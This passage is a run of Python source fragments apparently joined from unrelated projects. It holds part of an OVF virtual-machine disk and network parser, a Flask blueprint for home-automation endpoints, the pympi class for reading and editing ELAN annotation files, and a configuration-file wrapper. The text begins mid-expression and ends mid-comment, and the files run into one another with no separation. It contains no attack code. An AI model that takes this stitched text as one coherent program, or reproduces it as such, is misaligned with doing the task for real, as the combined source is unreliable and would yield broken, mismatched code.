        '(?P<m2_base>[0-9]+){sp}\^{sp}(?P<m2_exp>{exp}))'.format(
            op=operator,
            exp=exponent,
            sp=sp)
    # Both modifiers are optional: "byte", "byte * 10", "byte * 2^20", or
    # both combined.
    r = '^{base_unit}({sp}{mod1})?({sp}{mod2})?$'.format(
        base_unit=base_unit,
        mod1=modifier1,
        mod2=modifier2,
        sp=sp)

    m = re.match(r, units, re.MULTILINE)
    if m is None:
        raise V2VError('Failed to parse allocation units: %r' % units)
    g = m.groupdict()

    # Multiply in whichever modifiers actually matched.
    ret = 1
    if g['m1'] is not None:
        try:
            ret *= int(g['m1_num'])
        except ValueError:
            raise V2VError("Failed to parse allocation units: %r" % units)
    if g['m2'] is not None:
        try:
            ret *= pow(int(g['m2_base']), int(g['m2_exp']))
        except ValueError:
            raise V2VError("Failed to parse allocation units: %r" % units)

    return ret


def _add_disks_ovf_info(vm, node, ns):
    """Fill vm['disks'] from the OVF DiskSection, resolving each disk's
    file reference for its path (alias) and allocation."""
    vm['disks'] = []
    for d in node.findall(".//ovf:DiskSection/ovf:Disk", ns):
        disk = {'type': 'disk'}
        capacity = int(d.attrib.get('{%s}capacity' % _OVF_NS))
        units_attr = '{%s}capacityAllocationUnits' % _OVF_NS
        if units_attr in d.attrib:
            # Capacity may be expressed in units like "byte * 2^20".
            capacity *= _parse_allocation_units(d.attrib.get(units_attr))
        disk['capacity'] = str(capacity)
        fileref = d.attrib.get('{%s}fileRef' % _OVF_NS)
        ref = node.find('.//ovf:References/ovf:File[@ovf:id="%s"]' %
                        fileref, ns)
        if ref is None:
            raise V2VError('Error parsing ovf information: disk href info')
        disk['alias'] = ref.attrib.get('{%s}href' % _OVF_NS)
        disk['allocation'] = _get_max_disk_size(
            d.attrib.get('{%s}populatedSize' % _OVF_NS, None),
            ref.attrib.get('{%s}size' % _OVF_NS))
        vm['disks'].append(disk)


def _add_networks_ovf_info(vm, node, ns):
    """Fill vm['networks'] from the OVF's network resource items."""
    vm['networks'] = []
    query = './/ovf:Item[rasd:ResourceType="%d"]' % _OVF_RESOURCE_NETWORK
    for item in node.findall(query, ns):
        net = {}
        dev = item.find('./rasd:ElementName', ns)
        if dev is None:
            raise V2VError('Error parsing ovf information: '
                           'network element name')
        net['dev'] = dev.text

        model = item.find('./rasd:ResourceSubType', ns)
        if model is None:
            raise V2VError('Error parsing ovf information: network model')
        net['model'] = model.text

        # A Connection element means the NIC is attached to a bridge.
        bridge = item.find('./rasd:Connection', ns)
        if bridge is not None:
            net['bridge'] = bridge.text
            net['type'] = 'bridge'
        else:
            net['type'] = 'interface'
        vm['networks'].append(net)


def _simple_exec_cmd(command, env=None, nice=None, ioclass=None,
                     stdin=None, stdout=None, stderr=None):
    """Start `command` (optionally wrapped with nice/ionice) and return
    the CPopen handle without waiting for it to finish."""
    wrapped = wrap_command(command, with_ioclass=ioclass,
                           ioclassdata=None, with_nice=nice,
                           with_setsid=False, with_sudo=False,
                           reset_cpu_affinity=True)

    logging.debug(cmdutils.command_log_line(wrapped, cwd=None))

    return CPopen(wrapped, close_fds=True, cwd=None, env=env,
                  stdin=stdin, stdout=stdout, stderr=stderr)

# Endpoints for user to control the home.


from datetime import datetime
from flask import Blueprint, jsonify, request
from services import elements_services, home_services

# Blueprint carrying the home-control endpoints; registered by the app.
home_api = Blueprint('/home_api', __name__)
# Module-level service singletons shared by all request handlers below.
elements_services = elements_services.ElementsServices()
home_services = home_services.HomeServices()


@home_api.route('/profiles')
def profiles():
    """Gets all profiles for all elements for user application to
    display and manipulate elements"""
    all_profiles = home_services.get_profiles()
    return jsonify(all_profiles)


@home_api.route('/element', methods=['POST'])
def update_element():
    """Updates single element with all new values received from the
    user application"""
    home_services.update_element(request.get_json())
    return 'OK'


@home_api.route('/elements', methods=['POST'])
def update_elements():
    """Updates all elements with all new values received from the
    user application"""
    home_services.update_elements(request.get_json())
    return 'OK'


@home_api.route('/elementdelete', methods=['POST'])
def delete_element():
    """Deletes a single element with given hid"""
    payload = request.get_json()
    home_services.delete_element(payload['hid'])
    return 'OK'


@home_api.route('/timerules', methods=['POST'])
def timerules():
    """Adds, Updates or deletes time rule for the given element"""
    rules = request.get_json()

    if len(rules) == 0:
        raise Exception("No elements in the list")

    # Rules arriving without an id are treated as new entries.
    for rule in rules:
        rule.setdefault('id', None)

    home_services.save_time_rules(rules)
    return 'OK'

@home_api.route('/timerules/<string:hid>')
def get_timerules(hid):
    """Gets list of timerules for given hid"""
    return jsonify(home_services.read_time_rules(hid))

# -*- coding: utf-8 -*-

import time
import EafIO
import warnings


class Eaf:
    """Read and write Elan's Eaf files.

    .. note:: All times are in milliseconds and can't have decimals.

    :var dict annotation_document: Annotation document TAG entries.
    :var dict licences: Licences included in the file.
    :var dict header: XML header.
    :var list media_descriptors: Linked files, where every file is of the
                                 form: ``{attrib}``.
    :var list properties: Properties, where every property is of the form:
                          ``(value, {attrib})``.
    :var list linked_file_descriptors: Secondary linked files, where every
                                       linked file is of the form:
                                       ``{attrib}``.
    :var dict timeslots: Timeslot data of the form:
                         ``{TimeslotID -> time(ms)}``.
    :var dict tiers: Tier data of the form:
                     ``{tier_name -> (aligned_annotations,
                     reference_annotations, attributes, ordinal)}``,

                     aligned_annotations of the form:
                     ``[{annotation_id ->
                     (begin_ts, end_ts, value, svg_ref)}]``,

                     reference annotations of the form:
                     ``[{annotation_id ->
                     (reference, value, previous, svg_ref)}]``.
    :var list linguistic_types: Linguistic types, where every type is of the
                                form: ``{id -> attrib}``.
    :var list locales: Locales, where every locale is of the form:
                       ``{attrib}``.
    :var dict constraints: Constraint data of the form:
                           ``{stereotype -> description}``.
    :var dict controlled_vocabularies: Controlled vocabulary data of the
                                       form: ``{id ->
                                       (descriptions, entries, ext_ref)}``,

                                       descriptions of the form:
                                       ``[(lang_ref, text)]``,

                                       entries of the form:
                                       ``{id -> (values, ext_ref)}``,

                                       values of the form:
                                       ``[(lang_ref, description, text)]``.
    :var list external_refs: External references, where every reference is of
                             the form ``[id, type, value]``.
    :var list lexicon_refs: Lexicon references, where every reference is of
                            the form: ``[{attribs}]``.
    """

    def __init__(self, file_path=None, author='pympi'):
        """Construct either a new Eaf file or read one from a file/stream.

        :param str file_path: Path to read from, - for stdin. If ``None`` an
                              empty Eaf file will be created.
        :param str author: Author of the file.
        """
        self.naive_gen_ann, self.naive_gen_ts = False, False
        self.annotation_document = {
            'AUTHOR': author,
            'DATE': time.strftime("%Y-%m-%dT%H:%M:%S%z"),
            'VERSION': '2.8',
            'FORMAT': '2.8',
            'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
            'xsi:noNamespaceSchemaLocation':
                'http://www.mpi.nl/tools/elan/EAFv2.8.xsd'}
        self.constraints = {}
        self.controlled_vocabularies = {}
        self.header = {}
        self.licences = {}
        self.linguistic_types = {}
        self.tiers = {}
        self.timeslots = {}
        self.external_refs = []
        self.lexicon_refs = []
        self.linked_file_descriptors = []
        self.locales = []
        self.media_descriptors = []
        self.properties = []
        self.new_time, self.new_ann = 0, 0

        if file_path is None:
            self.add_linguistic_type('default-lt', None)
            self.constraints = {'Time_Subdivision': 'Time subdivision of paren'
                                't annotation\'s time interval, no time gaps a'
                                'llowed within this interval',
                                'Symbolic_Subdivision': 'Symbolic subdivision '
                                'of a parent annotation. Annotations refering '
                                'to the same parent are ordered',
                                'Symbolic_Association': '1-1 association with '
                                'a parent annotation',
                                'Included_In': 'Time alignable annotations wit'
                                'hin the parent annotation\'s time interval, g'
                                'aps are allowed'}
            self.properties.append(('0', {'NAME': 'lastUsedAnnotation'}))
            self.add_tier('default')
        else:
            EafIO.parse_eaf(file_path, self)

    def to_file(self, file_path, pretty=True):
        """Write the object to a file, if the file already exists a backup will
        be created with the ``.bak`` suffix.

        :param str file_path: Path to write to, - for stdout.
        :param bool pretty: Flag for pretty XML printing.
        """
        EafIO.to_eaf(file_path, self, pretty)

    def to_textgrid(self, excluded_tiers=[], included_tiers=[]):
        """Convert the object to a :class:`pympi.Praat.TextGrid` object.

        :param list excluded_tiers: Specifically exclude these tiers.
        :param list included_tiers: Only include this tiers, when empty all are
                                    included.
        :returns: :class:`pympi.Praat.TextGrid` object
        :raises ImportError: If the pympi.Praat module can't be loaded.
        """
        from Praat import TextGrid
        tgout = TextGrid()
        tiers = [a for a in self.tiers if a not in excluded_tiers]
        if included_tiers:
            tiers = [a for a in tiers if a in included_tiers]
        for tier in tiers:
            currentTier = tgout.add_tier(tier)
            for interval in self.get_annotation_data_for_tier(tier):
                # Zero-length intervals are invalid in Praat; skip them.
                if interval[0] == interval[1]:
                    continue
                currentTier.add_interval(interval[0]/1000.0,
                                         interval[1]/1000.0, interval[2])
        return tgout

    def extract(self, start, end):
        """Extracts the selected time frame as a new object.

        :param int start: Start time.
        :param int end: End time.
        :returns: The extracted frame in a new object.
        """
        from copy import deepcopy
        eaf_out = deepcopy(self)
        for tier in eaf_out.tiers.itervalues():
            rems = []
            # Drop annotations that extend beyond the requested frame.
            for ann in tier[0]:
                if eaf_out.timeslots[tier[0][ann][1]] > end or\
                        eaf_out.timeslots[tier[0][ann][0]] < start:
                    rems.append(ann)
            for r in rems:
                del tier[0][r]
        return eaf_out

    def get_linked_files(self):
        """Give all linked files."""
        return self.media_descriptors

    def add_linked_file(self, file_path, relpath=None, mimetype=None,
                        time_origin=None, ex_from=None):
        """Add a linked file.

        :param str file_path: Path of the file.
        :param str relpath: Relative path of the file.
        :param str mimetype: Mimetype of the file, if ``None`` it tries to
                             guess it according to the file extension which
                             currently only works for wav, mpg, mpeg and xml.
        :param int time_origin: Time origin for the media file.
        :param str ex_from: Extracted from field.
        :raises KeyError: If mimetype had to be guessed and a non standard
                          extension or an unknown mimetype.
        """
        if mimetype is None:
            mimes = {'wav': 'audio/x-wav', 'mpg': 'video/mpeg',
                     'mpeg': 'video/mpg', 'xml': 'text/xml'}
            mimetype = mimes[file_path.split('.')[-1]]
        self.media_descriptors.append({
            'MEDIA_URL': file_path, 'RELATIVE_MEDIA_URL': relpath,
            'MIME_TYPE': mimetype, 'TIME_ORIGIN': time_origin,
            'EXTRACTED_FROM': ex_from})

    def copy_tier(self, eaf_obj, tier_name):
        """Copies a tier to another :class:`pympi.Elan.Eaf` object.

        :param pympi.Elan.Eaf eaf_obj: Target Eaf object.
        :param str tier_name: Name of the tier.
        :raises KeyError: If the tier doesn't exist.
        """
        eaf_obj.remove_tier(tier_name)
        eaf_obj.add_tier(tier_name, tier_dict=self.tiers[tier_name][3])
        for ann in self.get_annotation_data_for_tier(tier_name):
            eaf_obj.insert_annotation(tier_name, ann[0], ann[1], ann[2])

    def add_tier(self, tier_id, ling='default-lt', parent=None, locale=None,
                 part=None, ann=None, tier_dict=None):
        """Add a tier.

        :param str tier_id: Name of the tier.
        :param str ling: Linguistic type, if the type is not available it will
                         warn and pick the first available type.
        :param str parent: Parent tier name.
        :param str locale: Locale.
        :param str part: Participant.
        :param str ann: Annotator.
        :param dict tier_dict: TAG attributes, when this is not ``None`` it
                               will ignore all other options.
        """
        if ling not in self.linguistic_types:
            warnings.warn(
                'add_tier: Linguistic type non existent, choosing the first')
            ling = self.linguistic_types.keys()[0]
        if tier_dict is None:
            self.tiers[tier_id] = ({}, {}, {
                'TIER_ID': tier_id,
                'LINGUISTIC_TYPE_REF': ling,
                'PARENT_REF': parent,
                'PARTICIPANT': part,
                'DEFAULT_LOCALE': locale,
                'ANNOTATOR': ann}, len(self.tiers))
        else:
            self.tiers[tier_id] = ({}, {}, tier_dict, len(self.tiers))

    def remove_tiers(self, tiers):
        """Remove multiple tiers, note that this is a lot faster then removing
        them individually because of the delayed cleaning of timeslots.

        :param list tiers: Names of the tier to remove.
        :raises KeyError: If a tier is non existent.
        """
        for a in tiers:
            # FIX: remove_tier has no ``check`` parameter; passing it raised
            # TypeError on every call.
            self.remove_tier(a, clean=False)
        self.clean_time_slots()

    def remove_tier(self, id_tier, clean=True):
        """Remove tier.

        :param str id_tier: Name of the tier.
        :param bool clean: Flag to also clean the timeslots.
        :raises KeyError: If tier is non existent.
        """
        del(self.tiers[id_tier])
        if clean:
            self.clean_time_slots()

    def get_tier_names(self):
        """List all the tier names.

        :returns: List of all tier names
        """
        return self.tiers.keys()

    def get_parameters_for_tier(self, id_tier):
        """Give the parameter dictionary, this is usable in :func:`add_tier`.

        :param str id_tier: Name of the tier.
        :returns: Dictionary of parameters.
        :raises KeyError: If the tier is non existent.
        """
        return self.tiers[id_tier][2]

    def child_tiers_for(self, id_tier):
        """Give all child tiers for a tier.

        :param str id_tier: Name of the tier.
        :returns: List of all children
        :raises KeyError: If the tier is non existent.
        """
        return [m for m in self.tiers if 'PARENT_REF' in self.tiers[m][2] and
                self.tiers[m][2]['PARENT_REF'] == id_tier]

    def get_annotation_data_for_tier(self, id_tier):
        """Gives a list of annotations of the form: ``(begin, end, value)``

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        a = self.tiers[id_tier][0]
        return [(self.timeslots[a[b][0]], self.timeslots[a[b][1]], a[b][2])
                for b in a]

    def get_annotation_data_at_time(self, id_tier, time):
        """Give the annotations at the given time.

        :param str id_tier: Name of the tier.
        :param int time: Time of the annotation.
        :returns: List of annotations at that time.
        :raises KeyError: If the tier is non existent.
        """
        anns = self.tiers[id_tier][0]
        return sorted(
            [(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
                for m in anns.itervalues() if
                self.timeslots[m[0]] <= time and
                self.timeslots[m[1]] >= time])

    def get_annotation_datas_between_times(self, id_tier, start, end):
        """Gives the annotations within the times.

        :param str id_tier: Name of the tier.
        :param int start: Start time of the annotation.
        :param int end: End time of the annotation.
        :returns: List of annotations within that time.
        :raises KeyError: If the tier is non existent.
        """
        anns = self.tiers[id_tier][0]
        return sorted([
            (self.timeslots[m[0]], self.timeslots[m[1]], m[2])
            for m in anns.itervalues() if self.timeslots[m[1]] >= start and
            self.timeslots[m[0]] <= end])

    def remove_all_annotations_from_tier(self, id_tier):
        """remove all annotations from a tier

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        self.tiers[id_tier][0], self.tiers[id_tier][1] = {}, {}
        self.clean_time_slots()

    def insert_annotation(self, id_tier, start, end, value='', svg_ref=None):
        """Insert an annotation.

        :param str id_tier: Name of the tier.
        :param int start: Start time of the annotation.
        :param int end: End time of the annotation.
        :param str value: Value of the annotation.
        :param str svg_ref: Svg reference.
        :raises KeyError: If the tier is non existent.
        """
        start_ts = self.generate_ts_id(start)
        end_ts = self.generate_ts_id(end)
        self.tiers[id_tier][0][self.generate_annotation_id()] =\
            (start_ts, end_ts, value, svg_ref)

    def remove_annotation(self, id_tier, time, clean=True):
        """Remove an annotation in a tier, if you need speed the best thing is
        to clean the timeslots after the last removal.

        :param str id_tier: Name of the tier.
        :param int time: Timepoint within the annotation.
        :param bool clean: Flag to clean the timeslots afterwards.
        :raises KeyError: If the tier is non existent.
        """
        # FIX: the original compared timeslot *id strings* (``'ts1'``)
        # against the int ``time`` with inverted inequalities, so nothing
        # was ever removed. Resolve the ids through self.timeslots and
        # match annotations whose interval contains ``time``.
        for b in [a for a in self.tiers[id_tier][0].iteritems() if
                  self.timeslots[a[1][0]] <= time and
                  self.timeslots[a[1][1]] >= time]:
            del(self.tiers[id_tier][0][b[0]])
        if clean:
            self.clean_time_slots()

    def insert_ref_annotation(self, id_tier, ref, value, prev, svg_ref=None):
        """Insert a reference annotation.

        :param str id_tier: Name of the tier.
        :param str ref: Id of the referenced annotation.
        :param str value: Value of the annotation.
        :param str prev: Id of the previous annotation.
        :param str svg_ref: Svg reference.
        :raises KeyError: If the tier is non existent.
        """
        self.tiers[id_tier][1][self.generate_annotation_id()] =\
            (ref, value, prev, svg_ref)

    def get_ref_annotation_data_for_tier(self, id_tier):
        """Give a list of all reference annotations of the form:
        ``[{id -> (ref, value, previous, svg_ref}]``

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        return self.tiers[id_tier][1]

    def remove_controlled_vocabulary(self, cv):
        """Remove a controlled vocabulary.

        :param str cv: Controlled vocabulary id.
        :raises KeyError: If the controlled vocabulary is non existent.
        """
        del(self.controlled_vocabularies[cv])

    def generate_annotation_id(self):
        """Generate the next annotation id, this function is mainly used
        internally.
        """
        if self.naive_gen_ann:
            new = self.last_ann+1
            self.last_ann = new
        else:
            new = 1
            anns = {int(ann[1:]) for tier in self.tiers.itervalues()
                    for ann in tier[0]}
            if len(anns) > 0:
                # Reuse the lowest free id; fall back to max+1 and switch to
                # the cheap naive counter when the id space has no holes.
                newann = set(xrange(1, max(anns))).difference(anns)
                if len(newann) == 0:
                    new = max(anns)+1
                    self.naive_gen_ann = True
                    self.last_ann = new
                else:
                    new = sorted(newann)[0]
        return 'a%d' % new

    def generate_ts_id(self, time=None):
        """Generate the next timeslot id, this function is mainly used
        internally

        :param int time: Initial time to assign to the timeslot
        """
        if self.naive_gen_ts:
            new = self.last_ts+1
            self.last_ts = new
        else:
            new = 1
            tss = {int(x[2:]) for x in self.timeslots}
            if len(tss) > 0:
                # Same reuse strategy as generate_annotation_id.
                newts = set(xrange(1, max(tss))).difference(tss)
                if len(newts) == 0:
                    new = max(tss)+1
                    self.naive_gen_ts = True
                    self.last_ts = new
                else:
                    new = sorted(newts)[0]
        ts = 'ts%d' % new
        self.timeslots[ts] = time
        return ts

    def clean_time_slots(self):
        """Clean up all unused timeslots.
        .. warning:: This can and will take time for larger tiers. When you
                     want to do a lot of operations on a lot of tiers please
                     unset the flags for cleaning in the functions so that the
                     cleaning is only performed afterwards.
        """
        ts_in_tier = set(sum([a[0:2] for tier in self.tiers.itervalues()
                              for a in tier[0].itervalues()], ()))
        ts_avail = set(self.timeslots)
        for a in ts_in_tier.symmetric_difference(ts_avail):
            del(self.timeslots[a])
        self.naive_gen_ts = False
        self.naive_gen_ann = False

    def generate_annotation_concat(self, tiers, start, end, sep='-'):
        """Give a string of concatenated annotation values for annotations
        within a timeframe.

        :param list tiers: List of tier names.
        :param int start: Start time.
        :param int end: End time.
        :param str sep: Separator string to use.
        :returns: String containing a concatenation of annotation values.
        :raises KeyError: If a tier is non existent.
        """
        return sep.join(
            set(d[2] for t in tiers if t in self.tiers for d in
                self.get_annotation_datas_between_times(t, start, end)))

    def merge_tiers(self, tiers, tiernew=None, gaptresh=1):
        """Merge tiers into a new tier and when the gap is lower then the
        threshhold glue the annotations together.

        :param list tiers: List of tier names.
        :param str tiernew: Name for the new tier, if ``None`` the name will be
                            generated.
        :param int gaptresh: Threshhold for the gaps.
        :raises KeyError: If a tier is non existent.
        :raises TypeError: If there are no annotations within the tiers.
        """
        if tiernew is None:
            tiernew = '%s_Merged' % '_'.join(tiers)
        self.remove_tier(tiernew)
        self.add_tier(tiernew)
        timepts = sorted(set.union(
            *[set(j for j in xrange(d[0], d[1])) for d in
                [ann for tier in tiers for ann in
                 self.get_annotation_data_for_tier(tier)]]))
        if len(timepts) > 1:
            start = timepts[0]
            for i in xrange(1, len(timepts)):
                if timepts[i]-timepts[i-1] > gaptresh:
                    self.insert_annotation(
                        tiernew, start, timepts[i-1],
                        self.generate_annotation_concat(tiers, start,
                                                        timepts[i-1]))
                    start = timepts[i]
            # FIX: the trailing annotation must run to the last timepoint;
            # the original used timepts[i-1] (the second-to-last point).
            self.insert_annotation(
                tiernew, start, timepts[-1],
                self.generate_annotation_concat(tiers, start, timepts[-1]))

    def shift_annotations(self, time):
        """Shift all annotations in time, this creates a new object.

        :param int time: Time shift width, negative numbers make a right shift.
        :returns: Shifted :class:`pympi.Elan.Eaf` object.
        """
        e = self.extract(
            -1*time, self.get_full_time_interval()[1]) if time < 0 else\
            self.extract(0, self.get_full_time_interval()[1]-time)
        for tier in e.tiers.itervalues():
            for ann in tier[0].itervalues():
                e.timeslots[ann[0]] = e.timeslots[ann[0]]+time
                e.timeslots[ann[1]] = e.timeslots[ann[1]]+time
        e.clean_time_slots()
        return e

    def filterAnnotations(self, tier, tier_name=None, filtin=None,
                          filtex=None):
        """Filter annotations in a tier

        :param str tier: Name of the tier:
        :param str tier_name: Name of the new tier, when ``None`` the name will
                              be generated.
        :param list filtin: List of strings to be included, if None all
                            annotations all is included.
        :param list filtex: List of strings to be excluded, if None no strings
                            are excluded.
        :raises KeyError: If the tier is non existent.
        """
        if tier_name is None:
            tier_name = '%s_filter' % tier
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        for a in [b for b in self.get_annotation_data_for_tier(tier)
                  if (filtex is None or b[2] not in filtex) and
                  (filtin is None or b[2] in filtin)]:
            self.insert_annotation(tier_name, a[0], a[1], a[2])

    def glue_annotations_in_tier(self, tier, tier_name=None, treshhold=85,
                                 filtin=None, filtex=None):
        """Glue annotatotions together in a tier.

        :param str tier: Name of the tier.
        :param str tier_name: Name of the new tier, if ``None`` the name will
                              be generated.
        :param int treshhold: Threshhold for the maximum gap to still glue.
        :param list filtin: List of strings to be included, if None all
                            annotations all is included.
        :param list filtex: List of strings to be excluded, if None no strings
                            are excluded.
        :raises KeyError: If the tier is non existent.
        """
        if tier_name is None:
            tier_name = '%s_glued' % tier
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        tier_data = sorted(self.get_annotation_data_for_tier(tier))
        tier_data = [t for t in tier_data if
                     (filtin is None or t[2] in filtin) and
                     (filtex is None or t[2] not in filtex)]
        currentAnn = None
        for i in xrange(0, len(tier_data)):
            if currentAnn is None:
                currentAnn = (tier_data[i][0], tier_data[i][1],
                              tier_data[i][2])
            elif tier_data[i][0] - currentAnn[1] < treshhold:
                currentAnn = (currentAnn[0], tier_data[i][1],
                              '%s_%s' % (currentAnn[2], tier_data[i][2]))
            else:
                self.insert_annotation(tier_name, currentAnn[0], currentAnn[1],
                                       currentAnn[2])
                currentAnn = tier_data[i]
        if currentAnn is not None:
            self.insert_annotation(tier_name, currentAnn[0],
                                   tier_data[len(tier_data)-1][1],
                                   currentAnn[2])

    def get_full_time_interval(self):
        """Give the full time interval of the file.

        :returns: Tuple of the form: ``(min_time, max_time)``.
        """
        return (min(self.timeslots.itervalues()),
                max(self.timeslots.itervalues()))

    def create_gaps_and_overlaps_tier(self, tier1, tier2, tier_name=None,
                                      maxlen=-1):
        """Create a tier with the gaps and overlaps of the annotations.
        For types see :func:`get_gaps_and_overlaps_duration`

        :param str tier1: Name of the first tier.
        :param str tier2: Name of the second tier.
        :param str tier_name: Name of the new tier, if ``None`` the name will
                              be generated.
        :param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
                           no maximum will be used.
        :returns: List of gaps and overlaps of the form:
                  ``[(type, start, end)]``.
        :raises KeyError: If a tier is non existent.
        :raises IndexError: If no annotations are available in the tiers.
        """
        if tier_name is None:
            tier_name = '%s_%s_ftos' % (tier1, tier2)
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        ftos = self.get_gaps_and_overlaps_duration(tier1, tier2, maxlen)
        for fto in ftos:
            self.insert_annotation(tier_name, fto[1], fto[2], fto[0])
        return ftos

    def get_gaps_and_overlaps_duration(self, tier1, tier2, maxlen=-1,
                                       progressbar=False):
        """Give gaps and overlaps. The return types are shown in the table
        below. The string will be of the format: ``id_tiername_tiername``.

        For example when a gap occurs between tier1 and tier2 and they are
        called ``speakerA`` and ``speakerB`` the annotation value of that gap
        will be ``G12_speakerA_speakerB``.

        | The gaps and overlaps are calculated using Heldner and Edlunds
          method found in:
        | *Heldner, M., & Edlund, J. (2010). Pauses, gaps and overlaps in
         conversations. Journal of Phonetics, 38(4), 555–568.
         doi:10.1016/j.wocn.2010.08.002*

        +-----+--------------------------------------------+
        | id  | Description                                |
        +=====+============================================+
        | O12 | Overlap from tier1 to tier2                |
        +-----+--------------------------------------------+
        | O21 | Overlap from tier2 to tier1                |
        +-----+--------------------------------------------+
        | G12 | Gap from tier1 to tier2                    |
        +-----+--------------------------------------------+
        | G21 | Gap from tier2 to tier1                    |
        +-----+--------------------------------------------+
        | P1  | Pause for tier1                            |
        +-----+--------------------------------------------+
        | P2  | Pause for tier2                            |
        +-----+--------------------------------------------+
        | B12 | Within speaker overlap from tier1 to tier2 |
        +-----+--------------------------------------------+
        | B21 | Within speaker overlap from tier2 to tier1 |
        +-----+--------------------------------------------+

        :param str tier1: Name of the first tier.
        :param str tier2: Name of the second tier.
        :param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
                           no maximum will be used.
        :param bool progressbar: Flag for debugging purposes that shows the
                                 progress during the process.
        :returns: List of gaps and overlaps of the form:
                  ``[(type, start, end)]``.
        :raises KeyError: If a tier is non existent.
        :raises IndexError: If no annotations are available in the tiers.
        """
        spkr1anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
                           for a in self.tiers[tier1][0].values())
        spkr2anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
                           for a in self.tiers[tier2][0].values())
        line1 = []
        isin = lambda x, lst: False if\
            len([i for i in lst if i[0] <= x and i[1] >= x]) == 0 else True
        minmax = (min(spkr1anns[0][0], spkr2anns[0][0]),
                  max(spkr1anns[-1][1], spkr2anns[-1][1]))
        last = (1, minmax[0])
        lastP = 0
        for ts in xrange(*minmax):
            in1, in2 = isin(ts, spkr1anns), isin(ts, spkr2anns)
            if in1 and in2:      # Both speaking
                if last[0] == 'B':
                    continue
                ty = 'B'
            elif in1:            # Only 1 speaking
                if last[0] == '1':
                    continue
                ty = '1'
            elif in2:            # Only 2 speaking
                if last[0] == '2':
                    continue
                ty = '2'
            else:                # None speaking
                if last[0] == 'N':
                    continue
                ty = 'N'
            line1.append((last[0], last[1], ts))
            last = (ty, ts)
            if progressbar and int((ts*1.0/minmax[1])*100) > lastP:
                lastP = int((ts*1.0/minmax[1])*100)
                # FIX: use function-call form (identical output in Python 2,
                # valid syntax in Python 3).
                print('%d%%' % lastP)
        line1.append((last[0], last[1], minmax[1]))
        ftos = []
        for i in xrange(len(line1)):
            if line1[i][0] == 'N':
                if i != 0 and i < len(line1) - 1 and\
                        line1[i-1][0] != line1[i+1][0]:
                    ftos.append(('G12_%s_%s' % (tier1, tier2)
                                if line1[i-1][0] == '1' else 'G21_%s_%s' %
                                (tier2, tier1), line1[i][1], line1[i][2]))
                else:
                    ftos.append(('P_%s' %
                                (tier1 if line1[i-1][0] == '1' else tier2),
                                line1[i][1], line1[i][2]))
            elif line1[i][0] == 'B':
                # FIX: the original tested the bare truthiness of
                # line1[i-1][0] and parenthesized the format so the fallback
                # string was fed back into 'O12_%s_%s' % ... (TypeError).
                # Mirror the G12/G21 branch above.
                if i != 0 and i < len(line1) - 1 and\
                        line1[i-1][0] != line1[i+1][0]:
                    ftos.append(('O12_%s_%s' % (tier1, tier2)
                                if line1[i-1][0] == '1' else 'O21_%s_%s' %
                                (tier2, tier1), line1[i][1], line1[i][2]))
                else:
                    ftos.append(('B_%s_%s' % ((tier1, tier2)
                                if line1[i-1][0] == '1' else
                                (tier2, tier1)), line1[i][1], line1[i][2]))
        return [f for f in ftos if maxlen == -1 or abs(f[2] - f[1]) < maxlen]

    def create_controlled_vocabulary(self, cv_id, descriptions, entries,
                                     ext_ref=None):
        """Create a controlled vocabulary.
        .. warning:: This is a very raw implementation and you should check the
                     Eaf file format specification for the entries.

        :param str cv_id: Name of the controlled vocabulary.
        :param list descriptions: List of descriptions.
        :param dict entries: Entries dictionary.
        :param str ext_ref: External reference.
        """
        # FIX: was self.controlledvocabularies (missing underscores), which
        # raised AttributeError and never touched the real attribute.
        self.controlled_vocabularies[cv_id] = (descriptions, entries, ext_ref)

    def get_tier_ids_for_linguistic_type(self, ling_type, parent=None):
        """Give a list of all tiers matching a linguistic type.

        :param str ling_type: Name of the linguistic type.
        :param str parent: Only match tiers from this parent, when ``None``
                           this option will be ignored.
        :returns: List of tiernames.
        :raises KeyError: If a tier or linguistic type is non existent.
        """
        return [t for t in self.tiers if
                self.tiers[t][2]['LINGUISTIC_TYPE_REF'] == ling_type and
                (parent is None or self.tiers[t][2]['PARENT_REF'] == parent)]

    def remove_linguistic_type(self, ling_type):
        """Remove a linguistic type.

        :param str ling_type: Name of the linguistic type.
        """
        del(self.linguistic_types[ling_type])

    def add_linguistic_type(self, lingtype, constraints=None,
                            timealignable=True, graphicreferences=False,
                            extref=None):
        """Add a linguistic type.

        :param str lingtype: Name of the linguistic type.
        :param list constraints: Constraint names.
        :param bool timealignable: Flag for time alignable.
        :param bool graphicreferences: Flag for graphic references.
        :param str extref: External reference.
        """
        self.linguistic_types[lingtype] = {
            'LINGUISTIC_TYPE_ID': lingtype,
            'TIME_ALIGNABLE': str(timealignable).lower(),
            'GRAPHIC_REFERENCES': str(graphicreferences).lower(),
            'CONSTRAINTS': constraints}
        if extref is not None:
            self.linguistic_types[lingtype]['EXT_REF'] = extref

    def get_linguistic_types(self):
        """Give a list of available linguistic types.

        :returns: List of linguistic type names.
        """
        return self.linguistic_types.keys()

import configparser

# Default location of the accounting configuration file (relative to CWD).
CONFIG_PATH = 'accounting.conf'


class MyConfigParser():
    """Thin wrapper around :class:`configparser.ConfigParser`.

    Reads the configuration file once at construction time and exposes a
    helper to dump a whole section into a plain dict.
    """

    def __init__(self, config_path=CONFIG_PATH):
        """Load the configuration from *config_path* (missing files are
        silently ignored, per ConfigParser.read semantics)."""
        self.config = configparser.ConfigParser(allow_no_value=True)
        self.config.read(config_path)

    def config_section_map(self, section):
        """Return all options of *section* as a dict.

        Keys are option names, values the raw strings read from the file
        (``None`` for options declared without a value, or whose value
        could not be retrieved).

        :raises configparser.NoSectionError: if *section* does not exist.
        """
        section_map = {}
        for option in self.config.options(section):
            try:
                section_map[option] = self.config.get(section, option)
            except configparser.Error:
                # Interpolation/lookup failure: record the option as unset
                # instead of aborting the whole dump.  (The original code
                # used a bare `except`, compared the string value against -1
